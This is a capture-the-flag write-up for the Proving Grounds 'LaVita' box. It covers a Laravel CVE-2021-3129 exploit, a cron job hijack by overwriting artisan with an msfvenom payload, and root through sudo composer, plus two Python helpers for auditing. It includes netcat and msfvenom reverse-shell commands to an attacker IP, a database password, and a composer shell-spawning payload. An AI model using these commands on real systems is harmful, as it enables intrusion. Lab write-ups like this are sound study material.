
Proving Grounds Practice - LaVita

Difficulty

medium

scan

[*] ssh found on tcp/22.
OpenSSH 8.4p1


[*] http found on tcp/80.
Apache/2.4.56 (Debian)

80

Click demo to reach the demo login page.

Register an account admin:adminadmin. After logging in you can upload files; an uploaded image is listed in the ImageList below the form and can be opened through its link. Renaming a PHP webshell to a .png extension did not upload successfully, and at the same time the image list went empty. At first this looked like the application deleting every file as soon as a malicious upload is detected; in fact a scheduled task wipes everything in the images folder once a minute.

Refreshing the page of an image uploaded earlier now gives a 404, and the error page reveals the CMS: Laravel 8.4.0.

foothold

searchsploit laravel turns up an RCE for Laravel 8.4.2 that depends on debug mode. Debug mode has to be on for it to work; it is in the ENABLED state here, but the searchsploit exploit code did not succeed.

The GitHub link in that exploit gives the CVE ID, CVE-2021-3129, and from there https://github.com/0x0d3ad/CVE-2021-3129 was found.

Clone and run the exploit; it returns a reverse shell. The PoC abuses the Ignition debug page: it first clears the Laravel log, then writes into it so that the log file becomes a valid PHAR, which is deserialized when Ignition is made to open it through a phar:// wrapper (the "Trying to clear logs" and "Convert log file to PHAR" steps in the output below).

└─$ python CVE-2021-3129.py http://192.168.212.38 --cmd "nc 192.168.45.234 4444 -e /bin/bash"
[+] Generating PHAR payload for command: nc 192.168.45.234 4444 -e /bin/bash
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.38] 56074
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upload and run linpeas; besides root, the only other user with a login shell is skunk.

╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
skunk:x:1001:1001::/home/skunk:/bin/bash

MySQL credentials are also found.

Connecting to MySQL shows that the tables are all empty apart from users, which holds only the admin account registered earlier.

mysql -ulavita -Dlavita -psdfquelw0kly9jgbx92
MariaDB [lavita]> show tables
show tables;
+------------------+
| Tables_in_lavita |
+------------------+
| failed_jobs |
| migrations |
| password_resets |
| sessions |
| users |
+------------------+
5 rows in set (0.000 sec)

foothold2

Upload and run pspy to capture the scheduled jobs: a process running as UID=1001 periodically cleans up the image files.

The artisan script that job invokes is owned by the current user (www-data), so generate a reverse shell with msfvenom -p php/reverse_php LHOST=192.168.45.234 LPORT=80 -f raw -o test.php, upload it and overwrite artisan with it.

ls -al artisan
-rwxr-xr-x 1 www-data www-data 1885 Feb 16 10:26 artisan

After a short wait the job fires and a shell as skunk comes back.

rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.38] 55570
id
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
whoami
skunk
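The check behind this step, written as an added example (not code from the original writeup or from the box): parse pspy-style output, resolve the files each command line executes or reads, and flag any file that a process of another UID touches but the current user can overwrite. The pspy lines and the project directory in demo() are constructed for the example; the box's real cron command is not reproduced on the page.

```python
import os
import re
import shutil
import tempfile

# pspy prints one line per exec(): "<ts> CMD: UID=<uid>  PID=<pid>  | <cmdline>"
PSPY_RE = re.compile(r"CMD: UID=(\d+)\s+PID=(\d+)\s+\|\s*(.*)")
SH_WRAPPER_RE = re.compile(r"^(?:/bin/|/usr/bin/)?(?:ba|da)?sh -c (.*)$")
SEP_RE = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")


def parse_pspy(text):
    """Yield (uid, cmdline) for every pspy CMD line; other lines are ignored."""
    for line in text.splitlines():
        m = PSPY_RE.search(line)
        if m:
            yield int(m.group(1)), m.group(3)


def referenced_paths(cmdline, cwd="/"):
    """Absolute paths a command line executes or passes as file arguments.

    `cd DIR` segments are tracked so a later bare name such as `artisan`
    resolves against DIR; a bare executable name is looked up on PATH;
    option tokens (-x, --x) are skipped.
    """
    m = SH_WRAPPER_RE.match(cmdline)
    script = m.group(1).strip("'\"") if m else cmdline
    paths = []
    for segment in SEP_RE.split(script):
        tokens = segment.split()
        if not tokens:
            continue
        if tokens[0] == "cd":
            if len(tokens) > 1:
                cwd = os.path.normpath(os.path.join(cwd, tokens[1]))
            continue
        exe = tokens[0] if "/" in tokens[0] else shutil.which(tokens[0])
        if exe:
            paths.append(os.path.normpath(os.path.join(cwd, exe)))
        for tok in tokens[1:]:
            if not tok.startswith("-"):
                paths.append(os.path.normpath(os.path.join(cwd, tok)))
    return paths


def writable_cron_targets(pspy_text, my_uid=None):
    """(uid, path) pairs where a process of another UID touches a file the
    current user can overwrite: the skunk/artisan situation on this box."""
    if my_uid is None:
        my_uid = os.getuid()
    hits = set()
    for uid, cmdline in parse_pspy(pspy_text):
        if uid == my_uid:
            continue
        for path in referenced_paths(cmdline):
            if os.path.isfile(path) and os.access(path, os.W_OK):
                hits.add((uid, path))
    return sorted(hits)


def demo():
    """Constructed scenario: a throwaway project dir with a writable `artisan`
    and hypothetical pspy lines (the box's real cron line is not on the page)."""
    project = tempfile.mkdtemp(prefix="lavita-")
    artisan = os.path.join(project, "artisan")
    with open(artisan, "w") as fh:
        fh.write("#!/usr/bin/env php\n<?php // placeholder for the real artisan script\n")
    os.chmod(artisan, 0o755)
    pspy = (
        "2024/02/16 10:27:01 CMD: UID=0     PID=1201   | /usr/sbin/CRON -f\n"
        f"2024/02/16 10:27:01 CMD: UID=1001  PID=1202   | /bin/sh -c cd {project} && php artisan cleanup\n"
        "2024/02/16 10:27:02 CMD: UID=0     PID=1204   | /usr/bin/apt-get update\n"
    )
    return artisan, writable_cron_targets(pspy, my_uid=33)


if __name__ == "__main__":
    artisan, hits = demo()
    for uid, path in hits:
        print(f"UID {uid} runs a writable file: {path}")
```

On a real target, feed it the saved pspy log and leave my_uid at the default; anything it prints is a file another account executes on a schedule that you can replace, which is exactly what made overwriting artisan work here.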

escalation

skunk can run composer as root without a password. The trailing * in the sudoers entry accepts any further arguments, and composer.json in the pinned working directory is writable by skunk (a member of the www-data group), so the method from https://gtfobins.github.io/gtfobins/composer/ gives a root shell.

sudo -l
Matching Defaults entries for skunk on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User skunk may run the following commands on debian:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >/var/www/html/lavita/composer.json
# the * in the sudoers entry is a wildcard matching the trailing arguments; it is not typed here
sudo composer --working-dir=/var/www/html/lavita run-script x
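The sudoers analysis a practitioner does by eye above, as an added example (not part of the original writeup): parse `sudo -l` output, pull each rule apart, and report the two properties that made this one exploitable, a trailing wildcard that lets an arbitrary subcommand through and a pinned directory the current account can write to. PAGE_SUDO_L is the output shown above; demo() swaps the working directory for a throwaway one so the writable-directory check fires offline. Names such as parse_sudo_l and assess are this example's own.

```python
import os
import re
import shlex
import tempfile

# One command rule from `sudo -l`: "(runas) [TAG: ...] command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def parse_sudo_l(text):
    """Yield {'runas', 'nopasswd', 'cmd'} for each rule listed after the
    'may run the following commands' line of `sudo -l` output."""
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        yield {"runas": m.group("runas").strip(),
               "nopasswd": "NOPASSWD" in tags,
               "cmd": m.group("cmd")}


def assess(rule):
    """Reasons a rule is abusable from this account. Directory checks use the
    real filesystem, so run it on the target for live results."""
    findings = []
    if rule["cmd"] == "ALL":
        findings.append("any command as %s%s" % (
            rule["runas"], " without a password" if rule["nopasswd"] else ""))
        return findings
    argv = shlex.split(rule["cmd"])   # shlex drops sudoers escapes: \= becomes =
    binary = argv[0]
    if rule["nopasswd"]:
        findings.append(f"{binary} as {rule['runas']} without a password")
    if "*" in argv:
        findings.append(f"{binary}: trailing wildcard, any extra arguments (a subcommand) are accepted")
    for arg in argv[1:]:
        path = arg.split("=", 1)[1] if arg.startswith("--") and "=" in arg else arg
        if os.path.isdir(path) and os.access(path, os.W_OK):
            findings.append(f"{binary}: pinned directory {path} is writable, so config it reads can be replaced")
    return findings


def audit(text):
    """(command, findings) for every rule in a `sudo -l` dump."""
    return [(r["cmd"], assess(r)) for r in parse_sudo_l(text)]


# The `sudo -l` output from the page, verbatim.
PAGE_SUDO_L = """\
Matching Defaults entries for skunk on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User skunk may run the following commands on debian:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/composer --working-dir\\=/var/www/html/lavita *
"""


def demo():
    """Constructed variant: the same composer rule pinned to a throwaway
    directory this process owns, so the writable-directory finding fires."""
    project = tempfile.mkdtemp(prefix="lavita-")
    text = PAGE_SUDO_L.replace("/var/www/html/lavita", project)
    composer_rule = list(parse_sudo_l(text))[1]
    return project, assess(composer_rule)


if __name__ == "__main__":
    for cmd, findings in audit(PAGE_SUDO_L):
        print(cmd)
        for f in findings:
            print("  -", f)
```

Both findings together are the escalation: the wildcard lets skunk append run-script x, and the writable working directory lets skunk supply the composer.json that defines what x runs.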

Side note: testing showed that the reverse shell from php/reverse_php cannot be upgraded to an interactive shell; the payload description indeed never claims reverse_php is interactive. `which perl` confirmed perl is present on the machine, so regenerate the payload with php/reverse_perl: msfvenom -p php/reverse_perl LHOST=192.168.45.234 LPORT=80 -f raw -o test.php, and overwrite artisan again. The new shell can be upgraded with python -c 'import pty; pty.spawn("/bin/bash")'. The composer escalation needs an Enter keypress typed by hand, and it only succeeded after switching to the interactive shell.